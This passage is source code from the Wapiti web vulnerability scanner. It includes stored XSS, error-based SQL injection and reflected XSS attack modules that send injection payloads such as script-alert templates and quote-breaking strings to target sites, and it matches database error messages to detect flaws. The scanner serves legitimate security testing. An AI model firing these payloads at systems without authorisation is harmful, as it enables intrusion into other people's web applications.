code_url = self.GET_XSS[code][0].url page = self.GET_XSS[code][0].path param_name = self.GET_XSS[code][1] if code in self.SUCCESSFUL_XSS: # is this an already known vuln (reflected XSS) if self.validXSS(data, code, self.SUCCESSFUL_XSS[code]): # if we can find the payload again, this is a stored XSS evil_req = HTTP.HTTPResource(code_url.replace(code, self.SUCCESSFUL_XSS[code])) if param_name == "QUERY_STRING": self.logR(Vulnerability.MSG_QS_INJECT, self.MSG_VULN, page) else: self.logR(Vulnerability.MSG_PARAM_INJECT, self.MSG_VULN, page, param_name) self.logR(Vulnerability.MSG_EVIL_URL, code_url) self.logVuln(category=Vulnerability.XSS, level=Vulnerability.HIGH_LEVEL, request=evil_req, info=_("Found permanent XSS in {0}" " with {1}").format(page, self.HTTP.escape(evil_req.url))) # we reported the vuln, now search another code continue # we where able to inject the ID but will we be able to inject javascript? else: timeouted = False returned500 = False for xss in self.independant_payloads: payload = xss.replace("__XSS__", code) evil_req = HTTP.HTTPResource(code_url.replace(code, payload)) try: http_code = self.HTTP.send(evil_req).getCode() dat = resp = self.HTTP.send(target_req).getPage() except requests.exceptions.Timeout: dat = "" if timeouted: continue self.logO(Anomaly.MSG_TIMEOUT, evil_req.url) self.logO(Anomaly.MSG_EVIL_REQUEST) self.logC(evil_req.http_repr) print('') self.logAnom(category=Anomaly.RES_CONSUMPTION, level=Anomaly.MEDIUM_LEVEL, request=evil_req, parameter=param_name, info=Anomaly.MSG_PARAM_TIMEOUT.format(param_name)) timeouted = True except Exception, e: print(_('error: {0} while attacking {1}').format(repr(str(e[0])), url)) continue if self.validXSS(dat, code, payload): # injection successful :) if param_name == "QUERY_STRING": self.logR(Vulnerability.MSG_QS_INJECT, self.MSG_VULN, page) else: self.logR(Vulnerability.MSG_PARAM_INJECT, self.MSG_VULN, page, param_name) self.logR(Vulnerability.MSG_EVIL_URL, evil_req.url) 
                                    self.logVuln(category=Vulnerability.XSS,
                                                 level=Vulnerability.HIGH_LEVEL,
                                                 request=evil_req,
                                                 info=_("Found permanent XSS in {0}"
                                                        " with {1}").format(url, self.HTTP.escape(evil_req.url)))
                                    # look for another code in the webpage
                                    break
                                elif http_code == "500" and not returned500:
                                    self.logAnom(category=Anomaly.ERROR_500,
                                                 level=Anomaly.HIGH_LEVEL,
                                                 request=evil_req,
                                                 parameter=param_name,
                                                 info=Anomaly.MSG_PARAM_500.format(param_name))
                                    self.logO(Anomaly.MSG_500, evil_req.url)
                                    self.logO(Vulnerability.MSG_EVIL_REQUEST)
                                    self.logC(evil_req.http_repr)
                                    print('')
                                    returned500 = True

            if self.doPOST == 1:
                for code in self.POST_XSS:
                    if code in data:
                        # code found in the webpage
                        if code in self.SUCCESSFUL_XSS:
                            # this code has been used in a successful attack
                            if self.validXSS(data, code, self.SUCCESSFUL_XSS[code]):
                                code_req = self.POST_XSS[code][0]
                                get_params = code_req.get_params
                                post_params = code_req.post_params
                                file_params = code_req.file_params
                                referer = code_req.referer

                                for params_list in [get_params, post_params, file_params]:
                                    for i in xrange(len(params_list)):
                                        param_name, v = params_list[i]
                                        param_name = self.HTTP.quote(param_name)
                                        if v == code:
                                            if params_list is file_params:
                                                params_list[i][1][0] = self.SUCCESSFUL_XSS[code]
                                            else:
                                                params_list[i][1] = self.SUCCESSFUL_XSS[code]

                                            # we found the xss payload again -> stored xss vuln
                                            evil_req = HTTP.HTTPResource(code_req.path,
                                                                         method="POST",
                                                                         get_params=get_params,
                                                                         post_params=post_params,
                                                                         file_params=file_params,
                                                                         referer=referer)

                                            self.logVuln(category=Vulnerability.XSS,
                                                         level=Vulnerability.HIGH_LEVEL,
                                                         request=evil_req,
                                                         parameter=param_name,
                                                         info=_("Found permanent XSS attacked by {0} with fields"
                                                                " {1}").format(evil_req.url,
                                                                               self.HTTP.encode(post_params)))
                                            self.logR(Vulnerability.MSG_PARAM_INJECT,
                                                      self.MSG_VULN,
                                                      evil_req.path,
                                                      param_name)
                                            self.logR(Vulnerability.MSG_EVIL_REQUEST)
                                            self.logC(evil_req.http_repr)
                                            print('')
                            # search for the next code in the webpage
                            continue

                        # we found the code but no attack was made
                        # let's try to break in
                        else:
                            code_req = self.POST_XSS[code][0]
                            get_params = code_req.get_params
                            post_params = code_req.post_params
                            file_params = code_req.file_params
                            referer = code_req.referer

                            for params_list in [get_params, post_params, file_params]:
                                for i in xrange(len(params_list)):
                                    param_name, v = params_list[i]
                                    param_name = self.HTTP.quote(param_name)
                                    if v == code:
                                        timeouted = False
                                        returned500 = False
                                        for xss in self.independant_payloads:
                                            payload = xss.replace("__XSS__", code)
                                            if params_list is file_params:
                                                params_list[i][1][0] = payload
                                            else:
                                                params_list[i][1] = payload
                                            try:
                                                evil_req = HTTP.HTTPResource(code_req.path,
                                                                             method=code_req.method,
                                                                             get_params=get_params,
                                                                             post_params=post_params,
                                                                             file_params=file_params,
                                                                             referer=referer)
                                                http_code = self.HTTP.send(evil_req).getCode()
                                                dat = self.HTTP.send(target_req).getPage()
                                            except requests.exceptions.Timeout:
                                                dat = ""
                                                if timeouted:
                                                    continue
                                                self.logO(Anomaly.MSG_TIMEOUT, evil_req.url)
                                                self.logO(Anomaly.MSG_EVIL_REQUEST)
                                                self.logC(evil_req.http_repr)
                                                print('')
                                                self.logAnom(category=Anomaly.RES_CONSUMPTION,
                                                             level=Anomaly.MEDIUM_LEVEL,
                                                             request=evil_req,
                                                             parameter=param_name,
                                                             info=Anomaly.MSG_PARAM_TIMEOUT.format(param_name))
                                                timeouted = True
                                            except Exception, e:
                                                print(_('error: {0} while attacking {1}')
                                                      .format(repr(str(e[0])), url))
                                                continue

                                            if self.validXSS(dat, code, payload):
                                                self.logVuln(category=Vulnerability.XSS,
                                                             level=Vulnerability.HIGH_LEVEL,
                                                             request=evil_req,
                                                             parameter=param_name,
                                                             info=_("Found permanent XSS attacked by {0} with fields"
                                                                    " {1}").format(evil_req.url,
                                                                                   self.HTTP.encode(post_params)))
                                                self.logR(Vulnerability.MSG_PARAM_INJECT,
                                                          self.MSG_VULN,
                                                          evil_req.path,
                                                          param_name)
                                                self.logR(Vulnerability.MSG_EVIL_REQUEST)
                                                self.logC(evil_req.http_repr)
                                                print('')
                                                break
                                            elif http_code == "500" and not returned500:
                                                self.logAnom(category=Anomaly.ERROR_500,
                                                             level=Anomaly.HIGH_LEVEL,
                                                             request=evil_req,
                                                             parameter=param_name,
                                                             info=Anomaly.MSG_PARAM_500.format(param_name))
                                                self.logO(Anomaly.MSG_500, evil_req.url)
                                                self.logO(Vulnerability.MSG_EVIL_REQUEST)
                                                self.logC(evil_req.http_repr)
                                                print('')
                                                returned500 = True

    # check whether our JS payload is injected in the webpage
    def validXSS(self, page, code, payload):
        if page is None or page == "":
            return False
        if payload.lower() in page.lower():
            return True
        return False

    def validContentType(self, http_res):
        """Check whether the returned content-type header allows javascript evaluation."""
        if not "content-type" in http_res.headers:
            return True
        if "text/html" in http_res.headers["content-type"]:
            return True
        return False

    def loadRequire(self, obj=[]):
        self.deps = obj
        for x in self.deps:
            if x.name == "xss":
                self.GET_XSS = x.GET_XSS
                self.POST_XSS = x.POST_XSS
                self.SUCCESSFUL_XSS = x.SUCCESSFUL_XSS
wapiti-2.3.0+dfsg/wapitiCore/attack/mod_sql.py000066400000000000000000000311021240201516300213040ustar00rootroot00000000000000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of the Wapiti project (http://wapiti.sourceforge.net)
# Copyright (C) 2008-2013 Nicolas Surribas
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import re
from wapitiCore.attack.attack import Attack
from wapitiCore.language.vulnerability import Vulnerability, Anomaly
import requests
from wapitiCore.net import HTTP


class mod_sql(Attack):
    """
    This class implements an error-based SQL Injection attack
    """

    TIME_TO_SLEEP = 6
    name = "sql"

    def __init__(self, http, xmlRepGenerator):
        Attack.__init__(self, http, xmlRepGenerator)

    def __findPatternInResponse(self, data):
        # Map well-known database error messages found in the response body
        # to the kind of injection they reveal ("" means nothing was found)
        if "You have an error in your SQL syntax" in data:
            return _("MySQL Injection")
        if "supplied argument is not a valid MySQL" in data:
            return _("MySQL Injection")
        if ("[Microsoft][ODBC Microsoft Access Driver]" in data or
                "Syntax error in string in query expression " in data):
            return _("Access-Based SQL Injection")
        if "[Microsoft][ODBC SQL Server Driver]" in data:
            return _("MSSQL-Based Injection")
        if 'Microsoft OLE DB Provider for ODBC Drivers error' in data:
            return _("MSSQL-Based Injection")
        if "Microsoft OLE DB Provider for ODBC Drivers" in data:
            return _("MSSQL-Based Injection")
        if "java.sql.SQLException: Syntax error or access violation" in data or \
                "java.sql.SQLException: Unexpected end of command" in data:
            return _("Java.SQL Injection")
        if "PostgreSQL query failed: ERROR: parser:" in data:
            return _("PostgreSQL Injection")
        if "XPathException" in data:
            return _("XPath Injection")
        if "Warning: SimpleXMLElement::xpath():" in data:
            return _("XPath Injection")
        if "supplied argument is not a valid ldap" in data or "javax.naming.NameNotFoundException" in data:
            return _("LDAP Injection")
        if "DB2 SQL error:" in data:
            return _("DB2 Injection")
        if "Dynamic SQL Error" in data:
            return _("Interbase Injection")
        if "Sybase message:" in data:
            return _("Sybase Injection")
        if "Unclosed quotation mark after the character string" in data:
            return _(".NET SQL Injection")
        if "error '80040e14'" in data and "Incorrect syntax near" in data:
            return _("MSSQL-Based Injection")

        ora_test = re.search("ORA-[0-9]{4,}", data)
        if ora_test is not None:
            return _("Oracle Injection") + " " + ora_test.group(0)

        return ""

    def setTimeout(self, timeout):
        self.TIME_TO_SLEEP = str(1 + int(timeout))

    def attackGET(self, http_res):
        """This method performs the SQL Injection attack with method GET"""
        page = http_res.path
        params_list = http_res.get_params
        resp_headers = http_res.headers
        referer = http_res.referer
        headers = {}
        if referer:
            headers["referer"] = referer

        # about this payload : http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
        payload = "\xBF'\"("
        vuln_found = 0

        if not params_list:
            # Do not attack application-type files
            if not "content-type" in resp_headers:
                # Sometimes there's no content-type... so we rely on the document extension
                if (page.split(".")[-1] not in self.allowed) and page[-1] != "/":
                    return
            elif not "text" in resp_headers["content-type"]:
                return

            err = ""
            payload = self.HTTP.quote(payload)
            url = page + "?" + payload
            if url not in self.attackedGET:
                self.attackedGET.append(url)
                evil_req = HTTP.HTTPResource(url)

                if self.verbose == 2:
                    print(u"+ {0}".format(url))
                try:
                    resp = self.HTTP.send(evil_req, headers=headers)
                    data, code = resp.getPageCode()
                except requests.exceptions.Timeout, timeout:
                    # No timeout report here... launch blind sql detection later
                    data = ""
                    code = "408"
                    err = ""
                    resp = timeout
                else:
                    err = self.__findPatternInResponse(data)
                if err != "":
                    vuln_found += 1
                    self.logVuln(category=Vulnerability.SQL_INJECTION,
                                 level=Vulnerability.HIGH_LEVEL,
                                 request=evil_req,
                                 info=_("{0} via injection in the query string").format(err))
                    self.logR(Vulnerability.MSG_QS_INJECT, err, page)
                    self.logR(Vulnerability.MSG_EVIL_URL, evil_req.url)

                    self.vulnerableGET.append(page + "?" + "__SQL__")
                else:
                    if code == "500":
                        self.logAnom(category=Anomaly.ERROR_500,
                                     level=Anomaly.HIGH_LEVEL,
                                     request=evil_req,
                                     info=Anomaly.MSG_QS_500)
                        self.logO(Anomaly.MSG_500, page)
                        self.logO(Anomaly.MSG_EVIL_URL, evil_req.url)
        else:
            for i in range(len(params_list)):
                err = ""
                param_name = self.HTTP.quote(params_list[i][0])
                saved_value = params_list[i][1]
                if saved_value is None:
                    saved_value = ""
                params_list[i][1] = "__SQL__"
                pattern_url = page + "?" + self.HTTP.encode(params_list)
                if pattern_url not in self.attackedGET:
                    self.attackedGET.append(pattern_url)

                    params_list[i][1] = self.HTTP.quote(payload)
                    url = page + "?" + self.HTTP.encode(params_list)
                    evil_req = HTTP.HTTPResource(url)

                    if self.verbose == 2:
                        print(u"+ {0}".format(evil_req.url))
                    try:
                        resp = self.HTTP.send(evil_req, headers=headers)
                        data, code = resp.getPageCode()
                    except requests.exceptions.Timeout, timeout:
                        # No timeout report here... launch blind sql detection later
                        data = ""
                        code = "408"
                        err = ""
                        resp = timeout
                    else:
                        err = self.__findPatternInResponse(data)
                    if err != "":
                        self.logVuln(category=Vulnerability.SQL_INJECTION,
                                     level=Vulnerability.HIGH_LEVEL,
                                     request=evil_req,
                                     parameter=param_name,
                                     info=_("{0} via injection in the parameter {1}").format(err, param_name))
                        self.logR(Vulnerability.MSG_PARAM_INJECT, err, page, param_name)
                        self.logR(Vulnerability.MSG_EVIL_URL, evil_req.url)
                        self.vulnerableGET.append(pattern_url)
                    elif code == "500":
                        self.logAnom(category=Anomaly.ERROR_500,
                                     level=Anomaly.HIGH_LEVEL,
                                     request=evil_req,
                                     parameter=param_name,
                                     info=Anomaly.MSG_PARAM_500.format(param_name))
                        self.logO(Anomaly.MSG_500, page)
                        self.logO(Anomaly.MSG_EVIL_URL, evil_req.url)
                params_list[i][1] = saved_value

    def attackPOST(self, form):
        """This method performs the SQL Injection attack with method POST"""
        payload = "\xbf'\"("
        filename_payload = "'\"("
        err = ""

        # copies
        get_params = form.get_params
        post_params = form.post_params
        file_params = form.file_params
        referer = form.referer

        for params_list in [get_params, post_params, file_params]:
            for i in xrange(len(params_list)):
                saved_value = params_list[i][1]
                if saved_value is None:
                    saved_value = ""

                if params_list is file_params:
                    params_list[i][1] = ["__SQL__", params_list[i][1][1]]
                else:
                    params_list[i][1] = "__SQL__"

                param_name = self.HTTP.quote(params_list[i][0])
                attack_pattern = HTTP.HTTPResource(form.path,
                                                   method=form.method,
                                                   get_params=get_params,
                                                   post_params=post_params,
                                                   file_params=file_params)
                if attack_pattern not in self.attackedPOST:
                    self.attackedPOST.append(attack_pattern)

                    if params_list is file_params:
                        params_list[i][1][0] = filename_payload
                    else:
                        params_list[i][1] = payload

                    evil_req = HTTP.HTTPResource(form.path,
                                                 method=form.method,
                                                 get_params=get_params,
                                                 post_params=post_params,
                                                 file_params=file_params,
                                                 referer=referer)
                    if self.verbose == 2:
                        print(u"+ {0}".format(evil_req))

                    try:
                        resp = self.HTTP.send(evil_req)
                        data, code = resp.getPageCode()
                    except requests.exceptions.Timeout, timeout:
                        # No timeout report here... launch blind sql detection later
                        data = ""
                        code = "408"
                        # reset err so a match from a previous parameter is not reported again
                        err = ""
                        resp = timeout
                    else:
                        err = self.__findPatternInResponse(data)
                    if err != "":
                        self.logVuln(category=Vulnerability.SQL_INJECTION,
                                     level=Vulnerability.HIGH_LEVEL,
                                     request=evil_req,
                                     parameter=param_name,
                                     info=_("{0} via injection in the parameter {1}").format(err, param_name))
                        self.logR(Vulnerability.MSG_PARAM_INJECT, err, evil_req.url, param_name)
                        self.logR(Vulnerability.MSG_EVIL_REQUEST)
                        self.logC(evil_req.http_repr)
                        print('')
                        self.vulnerablePOST.append(attack_pattern)
                    else:
                        if code == "500":
                            self.logAnom(category=Anomaly.ERROR_500,
                                         level=Anomaly.HIGH_LEVEL,
                                         request=evil_req,
                                         parameter=param_name,
                                         info=Anomaly.MSG_PARAM_500.format(param_name))
                            self.logO(Anomaly.MSG_500, evil_req.url)
                            self.logO(Anomaly.MSG_EVIL_REQUEST)
                            self.logC(evil_req.http_repr)
                            print('')
                params_list[i][1] = saved_value
wapiti-2.3.0+dfsg/wapitiCore/attack/mod_xss.py000066400000000000000000000751131240201516300213340ustar00rootroot00000000000000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of the Wapiti project (http://wapiti.sourceforge.net)
# Copyright (C) 2008-2013 Nicolas Surribas
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import random
import BeautifulSoup
import requests
import os
from wapitiCore.attack.attack import Attack
from wapitiCore.language.vulnerability import Vulnerability, Anomaly
from wapitiCore.net import HTTP


class mod_xss(Attack):
    """This class implements a cross site scripting attack"""

    # magic strings we must see to be sure script is vulnerable to XSS
    # payloads must be created on those patterns
    script_ok = ["alert('__XSS__')", "alert(\"__XSS__\")", "String.fromCharCode(0,__XSS__,1)"]

    # simple payloads that don't rely on their position in the DOM structure
    # payloads injected after closing a tag attribute value (attrval) or in the
    # content of a tag (text node, like between an opening tag and its closing tag)
    # only trick here must be on character encoding, filter bypassing, stuff like that
    # from the simplest to the most complex, Wapiti will stop at the first one that works
    independant_payloads = []
    php_self_payload = "%3Cscript%3Ephpselfxss()%3C/script%3E"
    # URL-decoded form of php_self_payload, as it appears when reflected in the page
    php_self_check = "<script>phpselfxss()</script>"

    name = "xss"

    # two dict exported for permanent XSS scanning
    # GET_XSS structure :
    # {uniq_code : http://url/?param1=value1&param2=uniq_code&param3..., next_uniq_code : ...}
    GET_XSS = {}
    # POST XSS structure :
    # {uniq_code: [target_url, {param1: val1, param2: uniq_code, param3:...}, referer_url], next_uniq_code : [...]...}
    POST_XSS = {}
    PHP_SELF = []

    # key = xss code, value = payload
    SUCCESSFUL_XSS = {}

    CONFIG_FILE = "xssPayloads.txt"

    MSG_VULN = _("XSS vulnerability")

    def __init__(self, http, xmlRepGenerator):
        Attack.__init__(self, http, xmlRepGenerator)
        self.independant_payloads = self.loadPayloads(os.path.join(self.CONFIG_DIR, self.CONFIG_FILE))

    def random_string(self):
        """Create a random unique ID that will be used to test injection.

        It doesn't use uppercase letters as BeautifulSoup makes some data lowercase."""
        return "w" + "".join([random.choice("0123456789abcdefghjijklmnopqrstuvwxyz") for __ in range(0, 9)])

    def _validXSSContentType(self, http_res):
        """Check whether the returned content-type header allows javascript evaluation."""
        # When no content-type is returned, browsers try to display the HTML
        if not "content-type" in http_res.headers:
            return True
        # else only text/html will allow javascript (maybe text/plain will work for IE...)
        if "text/html" in http_res.headers["content-type"]:
            return True
        return False

    def attackGET(self, http_res):
        """This method performs the cross site scripting attack (XSS attack) with method GET"""

        # copies
        page = http_res.path
        params_list = http_res.get_params
        resp_headers = http_res.headers
        referer = http_res.referer
        headers = {}
        http_code = ""
        if referer:
            headers["referer"] = referer

        param_name = "PHP_SELF"
        # Some PHP scripts don't sanitize data coming from $_SERVER['PHP_SELF']
        if page not in self.PHP_SELF:
            evil_req = None
            if page.endswith("/"):
                evil_req = HTTP.HTTPResource(page + self.php_self_payload)
            elif page.endswith(".php"):
                evil_req = HTTP.HTTPResource(page + "/" + self.php_self_payload)
            if evil_req is not None:
                if self.verbose == 2:
                    print(u"+ {0}".format(evil_req.url))
                try:
                    data, http_code = self.HTTP.send(evil_req, headers=headers).getPageCode()
                except requests.exceptions.Timeout:
                    data = ""
                    self.logO(Anomaly.MSG_TIMEOUT, evil_req.url)
                    self.logO(Anomaly.MSG_EVIL_REQUEST)
                    self.logC(evil_req.http_repr)
                    print('')
                    self.logAnom(category=Anomaly.RES_CONSUMPTION,
                                 level=Anomaly.MEDIUM_LEVEL,
                                 request=evil_req,
                                 parameter=param_name,
                                 info=Anomaly.MSG_PARAM_TIMEOUT.format(param_name))

                if self._validXSSContentType(evil_req) and self.php_self_check in data:
                    self.logR(Vulnerability.MSG_PATH_INJECT, self.MSG_VULN, page)
                    self.logR(Vulnerability.MSG_EVIL_URL, evil_req.url)
                    self.logVuln(category=Vulnerability.XSS,
                                 level=Vulnerability.HIGH_LEVEL,
                                 request=evil_req,
                                 parameter=param_name,
                                 info=_("XSS vulnerability found via injection in the resource path"))
                elif http_code == "500":
                    self.logAnom(category=Anomaly.ERROR_500,
                                 level=Anomaly.HIGH_LEVEL,
                                 request=evil_req,
                                 parameter=param_name,
                                 info=Anomaly.MSG_PARAM_500.format(param_name))
                    self.logO(Anomaly.MSG_500, evil_req.url)
                    self.logO(Vulnerability.MSG_EVIL_REQUEST)
                    self.logC(evil_req.http_repr)
                    print('')
            self.PHP_SELF.append(page)

        timeouted = False
        returned500 = False

        # page is the url of the script
        # params_list is a list of [key, value] lists
        if not params_list:
            # Do not attack application-type files
            if not "content-type" in resp_headers:
                # Sometimes there's no content-type... so we rely on the document extension
                if (page.split(".")[-1] not in self.allowed) and page[-1] != "/":
                    return
            elif not "text" in resp_headers["content-type"]:
                return

            url = page + "?__XSS__"
            if url not in self.attackedGET:
                self.attackedGET.append(url)
                code = self.random_string()
                test_req = HTTP.HTTPResource(page + "?" + code)
                self.GET_XSS[code] = (test_req, "QUERY_STRING")
                try:
                    data, http_code = self.HTTP.send(test_req, headers=headers).getPageCode()
                except requests.exceptions.Timeout:
                    data = ""
                if code in data:
                    # Simple text injection worked, let's try with JS code
                    payloads = self.generate_payloads(data, code)
                    for payload in payloads:
                        evil_req = HTTP.HTTPResource(page + "?" + self.HTTP.quote(payload))
                        if self.verbose == 2:
                            print(u"+ {0}".format(evil_req))
                        try:
                            dat, http_code = self.HTTP.send(evil_req, headers=headers).getPageCode()
                        except requests.exceptions.Timeout:
                            dat = ""
                            if timeouted:
                                continue
                            self.logO(Anomaly.MSG_TIMEOUT, evil_req.url)
                            self.logO(Anomaly.MSG_EVIL_REQUEST)
                            self.logC(evil_req.http_repr)
                            print('')
                            self.logAnom(category=Anomaly.RES_CONSUMPTION,
                                         level=Anomaly.MEDIUM_LEVEL,
                                         request=evil_req,
                                         parameter=param_name,
                                         info=Anomaly.MSG_PARAM_TIMEOUT.format(param_name))
                            timeouted = True

                        param_name = "QUERY_STRING"

                        if self._validXSSContentType(evil_req) and dat is not None and len(dat) > 1:
                            if payload.lower() in dat.lower():
                                self.SUCCESSFUL_XSS[code] = payload
                                self.logVuln(category=Vulnerability.XSS,
                                             level=Vulnerability.HIGH_LEVEL,
                                             request=evil_req,
                                             parameter=param_name,
                                             info=_("XSS vulnerability found via injection in the query string"))
                                self.logR(Vulnerability.MSG_QS_INJECT, self.MSG_VULN, page)
                                self.logR(Vulnerability.MSG_EVIL_URL, evil_req.url)
                                # No more payload injection
                                break
                            elif http_code == "500" and not returned500:
                                self.logAnom(category=Anomaly.ERROR_500,
                                             level=Anomaly.HIGH_LEVEL,
                                             request=evil_req,
                                             parameter=param_name,
                                             info=Anomaly.MSG_PARAM_500.format(param_name))
                                self.logO(Anomaly.MSG_500, evil_req.url)
                                self.logO(Vulnerability.MSG_EVIL_REQUEST)
                                self.logC(evil_req.http_repr)
                                print('')
                                returned500 = True

        # URL contains parameters
        else:
            for i in xrange(len(params_list)):
                saved_value = params_list[i][1]
                if saved_value is None:
                    saved_value = ""
                param_name = self.HTTP.quote(params_list[i][0])
                params_list[i][1] = "__XSS__"
                url = page + "?" + self.HTTP.encode(params_list)
                if url not in self.attackedGET:
                    self.attackedGET.append(url)
                    code = self.random_string()
                    params_list[i][1] = code
                    test_req = HTTP.HTTPResource(page + "?" + self.HTTP.encode(params_list))
                    self.GET_XSS[code] = (test_req, param_name)
                    try:
                        data, http_code = self.HTTP.send(test_req, headers=headers).getPageCode()
                    except requests.exceptions.Timeout:
                        data = ""
                    # is the random code on the webpage ?
                    if code in data:
                        # YES! But where exactly ?
                        payloads = self.generate_payloads(data, code)
                        for payload in payloads:
                            params_list[i][1] = payload
                            evil_req = HTTP.HTTPResource(page + "?" + self.HTTP.encode(params_list))
                            if self.verbose == 2:
                                print(u"+ {0}".format(evil_req))
                            try:
                                dat, http_code = self.HTTP.send(evil_req, headers=headers).getPageCode()
                            except requests.exceptions.Timeout:
                                dat = ""
                                if timeouted:
                                    continue
                                self.logO(Anomaly.MSG_TIMEOUT, evil_req.url)
                                self.logO(Anomaly.MSG_EVIL_REQUEST)
                                self.logC(evil_req.http_repr)
                                print('')
                                self.logAnom(category=Anomaly.RES_CONSUMPTION,
                                             level=Anomaly.MEDIUM_LEVEL,
                                             request=evil_req,
                                             parameter=param_name,
                                             info=Anomaly.MSG_PARAM_TIMEOUT.format(param_name))
                                timeouted = True

                            if self._validXSSContentType(evil_req) and dat is not None and len(dat) > 1:
                                if payload.lower() in dat.lower():
                                    self.SUCCESSFUL_XSS[code] = payload
                                    self.logVuln(category=Vulnerability.XSS,
                                                 level=Vulnerability.HIGH_LEVEL,
                                                 request=evil_req,
                                                 parameter=param_name,
                                                 info=_("XSS vulnerability found via injection"
                                                        " in the parameter {0}").format(param_name))
                                    self.logR(Vulnerability.MSG_PARAM_INJECT, self.MSG_VULN, page, param_name)
                                    self.logR(Vulnerability.MSG_EVIL_URL, evil_req.url)
                                    # stop trying payloads and jump to the next parameter
                                    break
                                elif http_code == "500" and not returned500:
                                    self.logAnom(category=Anomaly.ERROR_500,
                                                 level=Anomaly.HIGH_LEVEL,
                                                 request=evil_req,
                                                 parameter=param_name,
                                                 info=Anomaly.MSG_PARAM_500.format(param_name))
                                    self.logO(Anomaly.MSG_500, evil_req.url)
                                    self.logO(Vulnerability.MSG_EVIL_REQUEST)
                                    self.logC(evil_req.http_repr)
                                    print('')
                                    returned500 = True
                # Restore the value of this argument before testing the next one
                params_list[i][1] = saved_value

    def attackPOST(self, form):
        """This method performs the cross site scripting attack (XSS attack) with method POST"""

        page = form.url
        referer = form.referer
        headers = {}
        # defined up front so the "500" check below still works after a timeout
        http_code = ""
        if referer:
            headers["referer"] = referer
        param_name = "PHP_SELF"

        if page not in self.PHP_SELF:
            evil_req = None
            if page.endswith("/"):
                evil_req = HTTP.HTTPResource(page + self.php_self_payload)
            elif page.endswith(".php"):
                evil_req = HTTP.HTTPResource(page + "/" + self.php_self_payload)

            if evil_req:
                if self.verbose == 2:
                    print(u"+ {0}".format(evil_req.url))
                try:
                    data, http_code = self.HTTP.send(evil_req, headers=headers).getPageCode()
                except requests.exceptions.Timeout:
                    data = ""
                    self.logO(Anomaly.MSG_TIMEOUT, evil_req.url)
                    self.logO(Anomaly.MSG_EVIL_REQUEST)
                    self.logC(evil_req.http_repr)
                    print('')
                    self.logAnom(category=Anomaly.RES_CONSUMPTION,
                                 level=Anomaly.MEDIUM_LEVEL,
                                 request=evil_req,
                                 parameter=param_name,
                                 info=Anomaly.MSG_PARAM_TIMEOUT.format(param_name))

                if self._validXSSContentType(evil_req) and self.php_self_check in data:
                    self.logR(Vulnerability.MSG_PATH_INJECT, self.MSG_VULN, page)
                    self.logR(Vulnerability.MSG_EVIL_URL, evil_req.url)
                    self.logVuln(category=Vulnerability.XSS,
                                 level=Vulnerability.HIGH_LEVEL,
                                 request=evil_req,
                                 parameter=param_name,
                                 info=_("XSS vulnerability found via injection in the resource path"))
                elif http_code == "500":
                    self.logAnom(category=Anomaly.ERROR_500,
                                 level=Anomaly.HIGH_LEVEL,
                                 request=evil_req,
                                 parameter=param_name,
                                 info=Anomaly.MSG_PARAM_500.format(param_name))
                    self.logO(Anomaly.MSG_500, evil_req.url)
                    self.logO(Vulnerability.MSG_EVIL_REQUEST)
                    self.logC(evil_req.http_repr)
                    print('')
            self.PHP_SELF.append(page)

        timeouted = False
        returned500 = False

        # copies
        get_params = form.get_params
        post_params = form.post_params
        file_params = form.file_params

        for params_list in [get_params, post_params, file_params]:
            for i in xrange(len(params_list)):
                param_name = self.HTTP.quote(params_list[i][0])
                saved_value = params_list[i][1]
                if saved_value is None:
                    saved_value = ""
                if params_list is file_params:
                    params_list[i][1] = ["__XSS__", params_list[i][1][1]]
                else:
                    params_list[i][1] = "__XSS__"

                # We keep an attack pattern to be sure a given form won't be attacked on the same field several times
                attack_pattern = HTTP.HTTPResource(form.path,
                                                   method=form.method,
                                                   get_params=get_params,
                                                   post_params=post_params,
                                                   file_params=file_params)
                if not attack_pattern in self.attackedPOST:
                    self.attackedPOST.append(attack_pattern)
                    code = self.random_string()
                    if params_list is file_params:
                        params_list[i][1][0] = code
                    else:
                        params_list[i][1] = code
                    # will only memorize the last used payload (working or not) but the code will always be the right one
                    test_payload = HTTP.HTTPResource(form.path,
                                                     method=form.method,
                                                     get_params=get_params,
                                                     post_params=post_params,
                                                     file_params=file_params,
                                                     referer=referer)

                    self.POST_XSS[code] = (test_payload, param_name)
                    try:
                        data, http_code = self.HTTP.send(test_payload).getPageCode()
                    except requests.exceptions.Timeout:
                        data = ""
                    # rapid search on the code to check injection
                    if code in data:
                        # found, now study where the payload is injected and how to exploit it
                        payloads = self.generate_payloads(data, code)
                        for payload in payloads:
                            if params_list is file_params:
                                params_list[i][1][0] = payload
                            else:
                                params_list[i][1] = payload

                            evil_req = HTTP.HTTPResource(form.path,
                                                         method=form.method,
                                                         get_params=get_params,
                                                         post_params=post_params,
                                                         file_params=file_params,
                                                         referer=referer)

                            if self.verbose == 2:
                                print(u"+ {0}".format(evil_req))
                            try:
                                dat, http_code = self.HTTP.send(evil_req).getPageCode()
                            except requests.exceptions.Timeout:
                                dat = ""
                                if timeouted:
                                    continue
                                self.logO(Anomaly.MSG_TIMEOUT, evil_req.url)
                                self.logO(Anomaly.MSG_EVIL_REQUEST)
                                self.logC(evil_req.http_repr)
                                print('')
                                self.logAnom(category=Anomaly.RES_CONSUMPTION,
                                             level=Anomaly.MEDIUM_LEVEL,
                                             request=evil_req,
                                             parameter=param_name,
                                             info=Anomaly.MSG_PARAM_TIMEOUT.format(param_name))
                                timeouted = True

